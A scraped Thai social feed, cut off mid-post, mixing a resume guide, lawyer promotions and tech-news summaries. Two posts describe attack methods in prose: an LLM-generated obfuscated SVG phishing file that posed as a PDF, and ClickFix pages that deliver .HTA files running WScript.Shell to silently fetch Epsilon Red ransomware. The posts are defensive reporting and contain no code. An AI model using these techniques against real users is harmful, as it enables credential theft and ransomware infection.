resume is the document that Americans and Canadians need to have when applying for most jobs. Like a CV, a resume is typically adjusted to fit the specific job that a person is applying for, with more important or relevant experiences and accomplishments given priority. Typically, resumes are relatively short, usually only being one or two pages in length. In general, resumes lead with job histories and career accomplishments. While CVs tend to emphasize a person’s academic credentials, a resume tends to focus much more on what a person has done in their past work and how they can use that to succeed at a new job. In our comprehensive resume guide, we’ve provided three sample resumes you can use to follow along in this series and create your own format. CV vs. resume In general, CVs and resumes often contain similar information, are often both used to apply for jobs, and are both used to list a person’s experiences, skills, and accomplishments. The main differences between the two often have to do with length, what information is specifically listed, and what type of position a person is applying for. The purpose and specifics of CVs and resumes also vary depending on whether a person lives/works in the US/Canada versus another country. When to use a CV While it depends on the specific occasion, CVs are typically used in the United States and Canada when a person is applying for a fellowship, grant, or a job specifically in academia, medicine, or a research field. All of these are typically more concerned with a person’s credentials and expertise and thus require a detailed account of a person’s educational and research background. Outside of the US and Canada, CVs are typically used as the standard document that a person submits when applying to a job in any field. If an American or Canadian citizen is applying for an international position, they will typically need to submit a CV rather than a resume. When to use a resume In general, a resume is the document that most American and Canadian companies expect from an applicant looking for a job. Besides the particular fields mentioned above, most businesses in America and Canada will ask an applicant to submit a resume rather than a CV. Generally speaking, businesses are more interested in an applicant’s career experiences, prior jobs, training, skills, and career accomplishments than academic accomplishments. When applying for a job, most Americans and Canadians will be required to submit a resume (and possibly a cover letter). This shorter, more concise document is often preferred if a company uses automated review software or receives a large number of applications. Most of the time, an organization will make it clear whether they require a CV, resume, or even both. If you live in Canada or the US, you should expect to need a resume most of the time. If you live anywhere else, you should expect to write a CV. If you are unsure which is needed, it is best to ask for clarification. © 2025, Aakkhra, All rights reserved.
    0 Comments 0 Shares 750 Views 0 Reviews
  • “AI ปะทะ AI — Microsoft สกัดมัลแวร์ SVG ที่สร้างโดย LLM ก่อนหลอกขโมยรหัสผ่านองค์กร”

    ในวันที่ AI กลายเป็นทั้งเครื่องมือป้องกันและอาวุธของผู้โจมตี Microsoft ได้เปิดเผยรายละเอียดของแคมเปญฟิชชิ่งที่ใช้โค้ดที่สร้างโดย LLM (Large Language Model) เพื่อหลบเลี่ยงระบบตรวจจับแบบเดิม โดยมัลแวร์ถูกฝังในไฟล์ SVG ที่ปลอมตัวเป็น PDF และใช้เทคนิคการซ่อนข้อมูลที่ซับซ้อนจนแม้แต่นักวิเคราะห์ยังต้องพึ่ง AI เพื่อถอดรหัส

    แคมเปญนี้ถูกตรวจพบเมื่อวันที่ 18 สิงหาคม 2025 โดยเริ่มจากบัญชีอีเมลของธุรกิจขนาดเล็กที่ถูกแฮก แล้วส่งอีเมลไปยังเหยื่อผ่านช่องทาง BCC เพื่อหลบเลี่ยงการตรวจจับ โดยแนบไฟล์ชื่อ “23mb – PDF-6 pages.svg” ซึ่งดูเหมือนเอกสารธุรกิจทั่วไป แต่เมื่อเปิดขึ้นจะพาไปยังหน้า CAPTCHA ปลอม ก่อนนำไปสู่หน้าขโมยรหัสผ่าน

    สิ่งที่ทำให้แคมเปญนี้โดดเด่นคือการใช้โค้ดที่ซับซ้อนเกินกว่าที่มนุษย์จะเขียนเองได้ เช่น การใช้คำศัพท์ธุรกิจอย่าง “revenue,” “operations,” และ “risk” ซ่อนอยู่ในแอตทริบิวต์ของ SVG และถูกแปลงเป็น payload ที่สามารถรันได้ รวมถึงการใช้ CDATA และ XML declaration ที่ถูกต้องแต่ไม่จำเป็น ซึ่งเป็นลักษณะเฉพาะของโค้ดที่สร้างโดย AI

    Microsoft Security Copilot ซึ่งเป็นระบบ AI สำหรับวิเคราะห์ภัยคุกคาม ได้ตรวจพบลักษณะของโค้ดที่บ่งชี้ว่าเป็นผลผลิตของ LLM เช่น การตั้งชื่อฟังก์ชันที่ยาวเกินจำเป็น, โครงสร้างโค้ดแบบ modular ที่เกินความจำเป็น, และคอมเมนต์ที่เขียนด้วยภาษาทางธุรกิจอย่างเป็นทางการ

    แม้การโจมตีจะซับซ้อน แต่ Microsoft Defender for Office 365 ก็สามารถสกัดไว้ได้ โดยอาศัยการตรวจจับจากหลายปัจจัย เช่น ชื่อไฟล์ที่ผิดปกติ, การใช้ SVG เป็น payload, และพฤติกรรมการ redirect ที่ไม่ธรรมดา ซึ่งแสดงให้เห็นว่าแม้ AI จะถูกใช้ในฝั่งผู้โจมตี แต่ก็สามารถถูกใช้ในฝั่งป้องกันได้อย่างมีประสิทธิภาพเช่นกัน

    ข้อมูลสำคัญจากข่าว
    Microsoft ตรวจพบแคมเปญฟิชชิ่งที่ใช้โค้ดที่สร้างโดย LLM ฝังในไฟล์ SVG
    ไฟล์ SVG ปลอมตัวเป็น PDF และ redirect ไปยังหน้า CAPTCHA ปลอมก่อนขโมยรหัสผ่าน
    โค้ดมีลักษณะเฉพาะของ AI เช่น verbose naming, modular structure, และ business-style comments
    ใช้คำศัพท์ธุรกิจซ่อนในแอตทริบิวต์ของ SVG แล้วแปลงเป็น payload
    ใช้ CDATA และ XML declaration อย่างถูกต้องแต่ไม่จำเป็น
    อีเมลถูกส่งจากบัญชีที่ถูกแฮก โดยใช้ BCC เพื่อหลบการตรวจจับ
    Microsoft Defender for Office 365 สกัดการโจมตีได้สำเร็จ
    Security Copilot ใช้ AI วิเคราะห์และระบุว่าโค้ดไม่ใช่สิ่งที่มนุษย์เขียนเอง
    การตรวจจับอาศัยชื่อไฟล์, รูปแบบ SVG, redirect pattern และ session tracking

    ข้อมูลเสริมจากภายนอก
    SVG ถูกใช้เป็นช่องทางโจมตีมากขึ้น เพราะสามารถฝัง JavaScript และ HTML ได้
    LLM เช่น GPT สามารถสร้างโค้ดที่ซับซ้อนและหลบเลี่ยงการตรวจจับได้
    Security Copilot เป็นระบบ AI ที่ Microsoft พัฒนาเพื่อช่วยวิเคราะห์ภัยคุกคามแบบเรียลไทม์
    การใช้ CAPTCHA ปลอมเป็นเทคนิคที่ช่วยสร้างความน่าเชื่อถือก่อนหลอกเหยื่อ
    การโจมตีแบบนี้สะท้อนแนวโน้ม “AI vs. AI” ที่ทั้งสองฝ่ายใช้เทคโนโลยีเดียวกัน

    https://securityonline.info/ai-vs-ai-microsoft-blocks-phishing-attack-using-llm-generated-obfuscated-code/
    🤖 “AI ปะทะ AI — Microsoft สกัดมัลแวร์ SVG ที่สร้างโดย LLM ก่อนหลอกขโมยรหัสผ่านองค์กร” ในวันที่ AI กลายเป็นทั้งเครื่องมือป้องกันและอาวุธของผู้โจมตี Microsoft ได้เปิดเผยรายละเอียดของแคมเปญฟิชชิ่งที่ใช้โค้ดที่สร้างโดย LLM (Large Language Model) เพื่อหลบเลี่ยงระบบตรวจจับแบบเดิม โดยมัลแวร์ถูกฝังในไฟล์ SVG ที่ปลอมตัวเป็น PDF และใช้เทคนิคการซ่อนข้อมูลที่ซับซ้อนจนแม้แต่นักวิเคราะห์ยังต้องพึ่ง AI เพื่อถอดรหัส แคมเปญนี้ถูกตรวจพบเมื่อวันที่ 18 สิงหาคม 2025 โดยเริ่มจากบัญชีอีเมลของธุรกิจขนาดเล็กที่ถูกแฮก แล้วส่งอีเมลไปยังเหยื่อผ่านช่องทาง BCC เพื่อหลบเลี่ยงการตรวจจับ โดยแนบไฟล์ชื่อ “23mb – PDF-6 pages.svg” ซึ่งดูเหมือนเอกสารธุรกิจทั่วไป แต่เมื่อเปิดขึ้นจะพาไปยังหน้า CAPTCHA ปลอม ก่อนนำไปสู่หน้าขโมยรหัสผ่าน สิ่งที่ทำให้แคมเปญนี้โดดเด่นคือการใช้โค้ดที่ซับซ้อนเกินกว่าที่มนุษย์จะเขียนเองได้ เช่น การใช้คำศัพท์ธุรกิจอย่าง “revenue,” “operations,” และ “risk” ซ่อนอยู่ในแอตทริบิวต์ของ SVG และถูกแปลงเป็น payload ที่สามารถรันได้ รวมถึงการใช้ CDATA และ XML declaration ที่ถูกต้องแต่ไม่จำเป็น ซึ่งเป็นลักษณะเฉพาะของโค้ดที่สร้างโดย AI Microsoft Security Copilot ซึ่งเป็นระบบ AI สำหรับวิเคราะห์ภัยคุกคาม ได้ตรวจพบลักษณะของโค้ดที่บ่งชี้ว่าเป็นผลผลิตของ LLM เช่น การตั้งชื่อฟังก์ชันที่ยาวเกินจำเป็น, โครงสร้างโค้ดแบบ modular ที่เกินความจำเป็น, และคอมเมนต์ที่เขียนด้วยภาษาทางธุรกิจอย่างเป็นทางการ แม้การโจมตีจะซับซ้อน แต่ Microsoft Defender for Office 365 ก็สามารถสกัดไว้ได้ โดยอาศัยการตรวจจับจากหลายปัจจัย เช่น ชื่อไฟล์ที่ผิดปกติ, การใช้ SVG เป็น payload, และพฤติกรรมการ redirect ที่ไม่ธรรมดา ซึ่งแสดงให้เห็นว่าแม้ AI จะถูกใช้ในฝั่งผู้โจมตี แต่ก็สามารถถูกใช้ในฝั่งป้องกันได้อย่างมีประสิทธิภาพเช่นกัน ✅ ข้อมูลสำคัญจากข่าว ➡️ Microsoft ตรวจพบแคมเปญฟิชชิ่งที่ใช้โค้ดที่สร้างโดย LLM ฝังในไฟล์ SVG ➡️ ไฟล์ SVG ปลอมตัวเป็น PDF และ redirect ไปยังหน้า CAPTCHA ปลอมก่อนขโมยรหัสผ่าน ➡️ โค้ดมีลักษณะเฉพาะของ AI เช่น verbose naming, modular structure, และ business-style comments ➡️ ใช้คำศัพท์ธุรกิจซ่อนในแอตทริบิวต์ของ SVG แล้วแปลงเป็น payload ➡️ ใช้ CDATA และ XML declaration อย่างถูกต้องแต่ไม่จำเป็น ➡️ อีเมลถูกส่งจากบัญชีที่ถูกแฮก โดยใช้ BCC เพื่อหลบการตรวจจับ ➡️ Microsoft Defender for Office 365 สกัดการโจมตีได้สำเร็จ ➡️ Security Copilot ใช้ AI วิเคราะห์และระบุว่าโค้ดไม่ใช่สิ่งที่มนุษย์เขียนเอง ➡️ การตรวจจับอาศัยชื่อไฟล์, รูปแบบ SVG, redirect pattern และ session tracking ✅ ข้อมูลเสริมจากภายนอก ➡️ SVG ถูกใช้เป็นช่องทางโจมตีมากขึ้น เพราะสามารถฝัง JavaScript และ HTML ได้ ➡️ LLM เช่น GPT สามารถสร้างโค้ดที่ซับซ้อนและหลบเลี่ยงการตรวจจับได้ ➡️ Security Copilot เป็นระบบ AI ที่ Microsoft พัฒนาเพื่อช่วยวิเคราะห์ภัยคุกคามแบบเรียลไทม์ ➡️ การใช้ CAPTCHA ปลอมเป็นเทคนิคที่ช่วยสร้างความน่าเชื่อถือก่อนหลอกเหยื่อ ➡️ การโจมตีแบบนี้สะท้อนแนวโน้ม “AI vs. AI” ที่ทั้งสองฝ่ายใช้เทคโนโลยีเดียวกัน https://securityonline.info/ai-vs-ai-microsoft-blocks-phishing-attack-using-llm-generated-obfuscated-code/
    SECURITYONLINE.INFO
    AI vs. AI: Microsoft Blocks Phishing Attack Using LLM-Generated Obfuscated Code
    Microsoft blocked a credential phishing campaign that used AI to generate complex, verbose code in an SVG file to obfuscate its payload and evade defenses.
    0 Comments 0 Shares 428 Views 0 Reviews
  • ห้ามขายเครื่องดื่มแอลกอฮอล์ให้แก่บุคคลอายุต่ำกว่า 20 ปี
    ------------------------------------------------------------
    ช่องทางการติดตามจันทศิษฐ์ทนายความ
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Blockdit : https://www.blockdit.com/pages/684063179fb20fd9a69d4639
    Line Offcial : https://lin.ee/HfQHAph
    ห้ามขายเครื่องดื่มแอลกอฮอล์ให้แก่บุคคลอายุต่ำกว่า 20 ปี ------------------------------------------------------------ ช่องทางการติดตามจันทศิษฐ์ทนายความ Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Blockdit : https://www.blockdit.com/pages/684063179fb20fd9a69d4639 Line Offcial : https://lin.ee/HfQHAph
    0 Comments 0 Shares 533 Views 0 0 Reviews
  • “Windows 11 เพิ่มฟีเจอร์ทดสอบความเร็วเน็ตใน Taskbar — กดปุ๊บเปิด Bing ปั๊บ แต่ยังไม่ใช่ระบบในเครื่องจริง”

    Microsoft เตรียมเพิ่มฟีเจอร์ใหม่ใน Windows 11 ที่ให้ผู้ใช้สามารถทดสอบความเร็วอินเทอร์เน็ตได้ทันทีจาก Taskbar โดยไม่ต้องเปิดเว็บไซต์หรือแอปภายนอก โดยในเวอร์ชัน Insider ล่าสุด (Build 26220.6682 และ 26120.6682) มีการเพิ่มปุ่ม “Perform speed test” ทั้งในเมนูคลิกขวาของไอคอนเครือข่าย และในหน้า Quick Settings ของ Wi-Fi

    เมื่อคลิกปุ่มดังกล่าว ระบบจะเปิดเบราว์เซอร์และนำผู้ใช้ไปยัง Bing ซึ่งมีเครื่องมือทดสอบความเร็วเน็ตฝังอยู่ — หมายความว่าฟีเจอร์นี้ยังไม่ใช่การทดสอบแบบ native ภายใน Windows แต่เป็นการเชื่อมต่อไปยังบริการภายนอกที่ Microsoft ควบคุมผ่าน Bing

    นอกจากฟีเจอร์นี้ Microsoft ยังปรับปรุงหน้าการตั้งค่าหลายส่วน เช่น หน้า Mobile Devices ที่รวมการควบคุมโทรศัพท์ไว้ในที่เดียว และหน้า Privacy & Security ที่มีหัวข้อชัดเจนมากขึ้น รวมถึงหน้าใหม่ “Background AI tasks” ที่ยังไม่เสถียรและมีรายงานว่าทำให้ระบบล่มในบางกรณี

    แม้ฟีเจอร์เหล่านี้จะยังอยู่ในเวอร์ชันทดสอบ แต่ก็สะท้อนถึงแนวทางของ Microsoft ที่พยายามเพิ่มความสะดวกในการใช้งาน และเชื่อมโยงบริการของตนเองเข้ากับระบบปฏิบัติการอย่างแนบเนียนมากขึ้น

    ฟีเจอร์ใหม่ใน Windows 11 Insider Build
    เพิ่มปุ่ม “Perform speed test” ในเมนูคลิกขวาของไอคอนเครือข่ายใน Taskbar
    เพิ่มปุ่มทดสอบความเร็วในหน้า Quick Settings ของ Wi-Fi
    เมื่อคลิกแล้วจะเปิด Bing เพื่อทดสอบความเร็วอินเทอร์เน็ตผ่านเบราว์เซอร์
    ฟีเจอร์นี้อยู่ใน Build 26220.6682 และ 26120.6682 (KB5065782) ในช่อง Dev และ Beta

    การปรับปรุงหน้าการตั้งค่า
    หน้า Mobile Devices รวมการควบคุมโทรศัพท์ไว้ในหน้าหลักของ Bluetooth & Devices
    หน้า Privacy & Security ถูกจัดระเบียบใหม่ให้เข้าใจง่ายขึ้น
    เพิ่มหน้า “Background AI tasks” สำหรับควบคุมงานเบื้องหลังของ AI
    การเปลี่ยนแปลงเหล่านี้ยังอยู่ในขั้นตอนการทดสอบกับผู้ใช้ Insider

    https://www.tomshardware.com/software/windows/windows-11-is-getting-a-built-in-internet-speed-test-feature-that-will-take-you-to-bing-along-with-multiple-revamped-settings-pages-latest-insider-channel-builds-reveal-prominent-changes-coming-soon-to-the-os
    📶 “Windows 11 เพิ่มฟีเจอร์ทดสอบความเร็วเน็ตใน Taskbar — กดปุ๊บเปิด Bing ปั๊บ แต่ยังไม่ใช่ระบบในเครื่องจริง” Microsoft เตรียมเพิ่มฟีเจอร์ใหม่ใน Windows 11 ที่ให้ผู้ใช้สามารถทดสอบความเร็วอินเทอร์เน็ตได้ทันทีจาก Taskbar โดยไม่ต้องเปิดเว็บไซต์หรือแอปภายนอก โดยในเวอร์ชัน Insider ล่าสุด (Build 26220.6682 และ 26120.6682) มีการเพิ่มปุ่ม “Perform speed test” ทั้งในเมนูคลิกขวาของไอคอนเครือข่าย และในหน้า Quick Settings ของ Wi-Fi เมื่อคลิกปุ่มดังกล่าว ระบบจะเปิดเบราว์เซอร์และนำผู้ใช้ไปยัง Bing ซึ่งมีเครื่องมือทดสอบความเร็วเน็ตฝังอยู่ — หมายความว่าฟีเจอร์นี้ยังไม่ใช่การทดสอบแบบ native ภายใน Windows แต่เป็นการเชื่อมต่อไปยังบริการภายนอกที่ Microsoft ควบคุมผ่าน Bing นอกจากฟีเจอร์นี้ Microsoft ยังปรับปรุงหน้าการตั้งค่าหลายส่วน เช่น หน้า Mobile Devices ที่รวมการควบคุมโทรศัพท์ไว้ในที่เดียว และหน้า Privacy & Security ที่มีหัวข้อชัดเจนมากขึ้น รวมถึงหน้าใหม่ “Background AI tasks” ที่ยังไม่เสถียรและมีรายงานว่าทำให้ระบบล่มในบางกรณี แม้ฟีเจอร์เหล่านี้จะยังอยู่ในเวอร์ชันทดสอบ แต่ก็สะท้อนถึงแนวทางของ Microsoft ที่พยายามเพิ่มความสะดวกในการใช้งาน และเชื่อมโยงบริการของตนเองเข้ากับระบบปฏิบัติการอย่างแนบเนียนมากขึ้น ✅ ฟีเจอร์ใหม่ใน Windows 11 Insider Build ➡️ เพิ่มปุ่ม “Perform speed test” ในเมนูคลิกขวาของไอคอนเครือข่ายใน Taskbar ➡️ เพิ่มปุ่มทดสอบความเร็วในหน้า Quick Settings ของ Wi-Fi ➡️ เมื่อคลิกแล้วจะเปิด Bing เพื่อทดสอบความเร็วอินเทอร์เน็ตผ่านเบราว์เซอร์ ➡️ ฟีเจอร์นี้อยู่ใน Build 26220.6682 และ 26120.6682 (KB5065782) ในช่อง Dev และ Beta ✅ การปรับปรุงหน้าการตั้งค่า ➡️ หน้า Mobile Devices รวมการควบคุมโทรศัพท์ไว้ในหน้าหลักของ Bluetooth & Devices ➡️ หน้า Privacy & Security ถูกจัดระเบียบใหม่ให้เข้าใจง่ายขึ้น ➡️ เพิ่มหน้า “Background AI tasks” สำหรับควบคุมงานเบื้องหลังของ AI ➡️ การเปลี่ยนแปลงเหล่านี้ยังอยู่ในขั้นตอนการทดสอบกับผู้ใช้ Insider https://www.tomshardware.com/software/windows/windows-11-is-getting-a-built-in-internet-speed-test-feature-that-will-take-you-to-bing-along-with-multiple-revamped-settings-pages-latest-insider-channel-builds-reveal-prominent-changes-coming-soon-to-the-os
    0 Comments 0 Shares 285 Views 0 Reviews
  • “Doomscrolling: The Game — เมื่อการเลื่อนหน้าจอกลายเป็นเกมที่ทั้งเสียดสีและเสพติด”

    David Friedman นักเขียนจาก Ironic Sans ได้สร้างเกมที่ไม่เหมือนใครในชื่อว่า “Doomscrolling: The Game” ซึ่งได้รับแรงบันดาลใจจากพฤติกรรมของผู้คนที่เลื่อนฟีดข่าวอย่างไม่หยุดยั้งจนรู้สึกหดหู่ หรือที่เรียกว่า doomscrolling โดยเขาตั้งคำถามว่า “ถ้า Doom เป็นเกมที่เล่นด้วยการเลื่อนหน้าจอเท่านั้น จะเป็นอย่างไร?” และคำตอบก็คือเกมนี้ — ที่คุณไม่ต้องกระโดด ไม่ต้องเคลื่อนที่ด้านข้าง แค่เลื่อนลงไปเรื่อย ๆ

    เกมนี้เริ่มต้นจากความล้มเหลว เพราะ GPT-4 ไม่สามารถเข้าใจแนวคิด “เลื่อนลง = พื้นหลังเลื่อนขึ้น” ได้เลย แต่เมื่อ GPT-5 เปิดตัว Friedman กลับมาลองใหม่ และสามารถสร้างต้นแบบเกมได้ภายใน 2 ชั่วโมง โดยใช้ vibe coding และการทดลองผ่าน “lab pages” ที่ให้เขาปรับค่าต่าง ๆ ด้วยตัวเอง เช่น สีพื้นหลัง, รูปแบบใยแมงมุม, หรือดีไซน์แผ่นป้ายข่าว

    ตัวเกมมีระบบที่กระตุ้นให้ผู้เล่นเคลื่อนไหว เช่น อัปเกรดอาวุธทุก 100 ตัวที่ฆ่า, กำแพงไฟที่ไล่ตามถ้าหยุดนานเกินไป, และสิ่งกีดขวางอย่างใยแมงมุมหรือกำแพงอิฐ นอกจากนี้ยังมี “แผ่นป้ายข่าว” ที่แสดงพาดหัวข่าวจริงจาก RSS ของ New York Times เพื่อสร้างบรรยากาศ doomscrolling อย่างแท้จริง — อ่านแล้วหดหู่แต่ก็อดไม่ได้ที่จะเลื่อนต่อ

    แม้ Friedman จะไม่ใช่นักพัฒนาเกมมืออาชีพ แต่เขาใช้ AI เป็นเครื่องมือในการสร้างเกมที่มีเสน่ห์เฉพาะตัว และเปิดให้เล่นฟรีทั้งบนมือถือและเดสก์ท็อป โดยสามารถบันทึกเกมไว้ในหน้าจอหลักให้เหมือนแอปจริงได้

    จุดเด่นของ Doomscrolling: The Game
    เล่นด้วยการเลื่อนหน้าจอเท่านั้น — ไม่มีการเคลื่อนที่ด้านข้างหรือกระโดด
    ได้แรงบันดาลใจจากเกม Doom และพฤติกรรม doomscrolling
    ใช้ GPT-5 ในการสร้างต้นแบบเกมภายในเวลาอันสั้น
    ใช้ vibe coding และ lab pages เพื่อปรับแต่งองค์ประกอบเกม

    ระบบเกมที่กระตุ้นให้เคลื่อนไหว
    อัปเกรดอาวุธทุก 100 ตัวที่ฆ่า
    กำแพงไฟไล่ตามถ้าหยุดนานเกินไป
    มีสิ่งกีดขวาง เช่น ใยแมงมุมและกำแพงอิฐ
    มี health potion และระบบบันทึกระยะทางที่ทำได้

    การผสานข่าวจริงเข้ากับเกม
    ใช้ RSS feed จาก New York Times แสดงพาดหัวข่าวบนแผ่นป้าย
    ข่าวไม่มีผลต่อเกม แต่สร้างบรรยากาศ doomscrolling อย่างแท้จริง
    ผู้เล่นอาจถูกดึงดูดให้หยุดอ่านข่าวระหว่างเล่น
    เป็นการเสียดสีพฤติกรรมเสพข่าวที่ไม่มีวันจบ

    ข้อมูลเสริมจากภายนอก
    เกมนี้เป็นตัวอย่างของ “vibe-coded” project ที่ใช้ AI อย่างสร้างสรรค์
    Friedman ใช้ lab pages เพื่อปรับค่ากราฟิก เช่น ใยแมงมุมและแผ่นป้าย
    เกมสามารถเล่นได้ทั้งบนมือถือและเดสก์ท็อปอย่างลื่นไหล
    มีผู้เล่นบางรายรายงานปัญหาเรื่องการเลื่อนหน้าจอบนบางเบราว์เซอร์

    https://ironicsans.ghost.io/doomscrolling-the-game/
    🕹️ “Doomscrolling: The Game — เมื่อการเลื่อนหน้าจอกลายเป็นเกมที่ทั้งเสียดสีและเสพติด” David Friedman นักเขียนจาก Ironic Sans ได้สร้างเกมที่ไม่เหมือนใครในชื่อว่า “Doomscrolling: The Game” ซึ่งได้รับแรงบันดาลใจจากพฤติกรรมของผู้คนที่เลื่อนฟีดข่าวอย่างไม่หยุดยั้งจนรู้สึกหดหู่ หรือที่เรียกว่า doomscrolling โดยเขาตั้งคำถามว่า “ถ้า Doom เป็นเกมที่เล่นด้วยการเลื่อนหน้าจอเท่านั้น จะเป็นอย่างไร?” และคำตอบก็คือเกมนี้ — ที่คุณไม่ต้องกระโดด ไม่ต้องเคลื่อนที่ด้านข้าง แค่เลื่อนลงไปเรื่อย ๆ เกมนี้เริ่มต้นจากความล้มเหลว เพราะ GPT-4 ไม่สามารถเข้าใจแนวคิด “เลื่อนลง = พื้นหลังเลื่อนขึ้น” ได้เลย แต่เมื่อ GPT-5 เปิดตัว Friedman กลับมาลองใหม่ และสามารถสร้างต้นแบบเกมได้ภายใน 2 ชั่วโมง โดยใช้ vibe coding และการทดลองผ่าน “lab pages” ที่ให้เขาปรับค่าต่าง ๆ ด้วยตัวเอง เช่น สีพื้นหลัง, รูปแบบใยแมงมุม, หรือดีไซน์แผ่นป้ายข่าว ตัวเกมมีระบบที่กระตุ้นให้ผู้เล่นเคลื่อนไหว เช่น อัปเกรดอาวุธทุก 100 ตัวที่ฆ่า, กำแพงไฟที่ไล่ตามถ้าหยุดนานเกินไป, และสิ่งกีดขวางอย่างใยแมงมุมหรือกำแพงอิฐ นอกจากนี้ยังมี “แผ่นป้ายข่าว” ที่แสดงพาดหัวข่าวจริงจาก RSS ของ New York Times เพื่อสร้างบรรยากาศ doomscrolling อย่างแท้จริง — อ่านแล้วหดหู่แต่ก็อดไม่ได้ที่จะเลื่อนต่อ แม้ Friedman จะไม่ใช่นักพัฒนาเกมมืออาชีพ แต่เขาใช้ AI เป็นเครื่องมือในการสร้างเกมที่มีเสน่ห์เฉพาะตัว และเปิดให้เล่นฟรีทั้งบนมือถือและเดสก์ท็อป โดยสามารถบันทึกเกมไว้ในหน้าจอหลักให้เหมือนแอปจริงได้ ✅ จุดเด่นของ Doomscrolling: The Game ➡️ เล่นด้วยการเลื่อนหน้าจอเท่านั้น — ไม่มีการเคลื่อนที่ด้านข้างหรือกระโดด ➡️ ได้แรงบันดาลใจจากเกม Doom และพฤติกรรม doomscrolling ➡️ ใช้ GPT-5 ในการสร้างต้นแบบเกมภายในเวลาอันสั้น ➡️ ใช้ vibe coding และ lab pages เพื่อปรับแต่งองค์ประกอบเกม ✅ ระบบเกมที่กระตุ้นให้เคลื่อนไหว ➡️ อัปเกรดอาวุธทุก 100 ตัวที่ฆ่า ➡️ กำแพงไฟไล่ตามถ้าหยุดนานเกินไป ➡️ มีสิ่งกีดขวาง เช่น ใยแมงมุมและกำแพงอิฐ ➡️ มี health potion และระบบบันทึกระยะทางที่ทำได้ ✅ การผสานข่าวจริงเข้ากับเกม ➡️ ใช้ RSS feed จาก New York Times แสดงพาดหัวข่าวบนแผ่นป้าย ➡️ ข่าวไม่มีผลต่อเกม แต่สร้างบรรยากาศ doomscrolling อย่างแท้จริง ➡️ ผู้เล่นอาจถูกดึงดูดให้หยุดอ่านข่าวระหว่างเล่น ➡️ เป็นการเสียดสีพฤติกรรมเสพข่าวที่ไม่มีวันจบ ✅ ข้อมูลเสริมจากภายนอก ➡️ เกมนี้เป็นตัวอย่างของ “vibe-coded” project ที่ใช้ AI อย่างสร้างสรรค์ ➡️ Friedman ใช้ lab pages เพื่อปรับค่ากราฟิก เช่น ใยแมงมุมและแผ่นป้าย ➡️ เกมสามารถเล่นได้ทั้งบนมือถือและเดสก์ท็อปอย่างลื่นไหล ➡️ มีผู้เล่นบางรายรายงานปัญหาเรื่องการเลื่อนหน้าจอบนบางเบราว์เซอร์ https://ironicsans.ghost.io/doomscrolling-the-game/
    IRONICSANS.GHOST.IO
    Doomscrolling: The Game
    Can a game work where all you do is scroll?
    0 Comments 0 Shares 409 Views 0 Reviews
  • ความผิดฐานชิงทรัพย์ ตามมาตรา 339
    #กฎหมาย #ทนายความ
    --------------------------------------------------------------------
    ช่องทางการติดตามจันทศิษฐ์ทนายความ
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Blockdit : https://www.blockdit.com/pages/684063179fb20fd9a69d4639
    Line Offcial : https://lin.ee/HfQHAph
    ความผิดฐานชิงทรัพย์ ตามมาตรา 339 #กฎหมาย #ทนายความ -------------------------------------------------------------------- ช่องทางการติดตามจันทศิษฐ์ทนายความ Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Blockdit : https://www.blockdit.com/pages/684063179fb20fd9a69d4639 Line Offcial : https://lin.ee/HfQHAph
    0 Comments 0 Shares 503 Views 0 0 Reviews
  • EP.79 : ความผิดฐานชิงทรัพย์ ตามมาตรา 339
    --------------------------------------------------------------------
    ช่องทางการติดตามจันทศิษฐ์ทนายความ
    Instagram : https://www.instagram.com/jantasit_lawyer/...#
    Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ
    Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1...
    Thaitimes : https://thaitimes.co/pages/jtslawyer
    Blockdit : https://www.blockdit.com/pages/684063179fb20fd9a69d4639
    Line Offcial : https://lin.ee/HfQHAph
    EP.79 : ความผิดฐานชิงทรัพย์ ตามมาตรา 339 -------------------------------------------------------------------- ช่องทางการติดตามจันทศิษฐ์ทนายความ Instagram : https://www.instagram.com/jantasit_lawyer/...# Youtube : https://www.youtube.com/channel/UCYy2exOkFMr_k62i0a_vbCQ Tiktok : https://www.tiktok.com/@jantasit_law36?is_from_webapp=1... Thaitimes : https://thaitimes.co/pages/jtslawyer Blockdit : https://www.blockdit.com/pages/684063179fb20fd9a69d4639 Line Offcial : https://lin.ee/HfQHAph
    0 Comments 0 Shares 473 Views 0 Reviews
  • เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ

    ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows

    เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ

    เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น

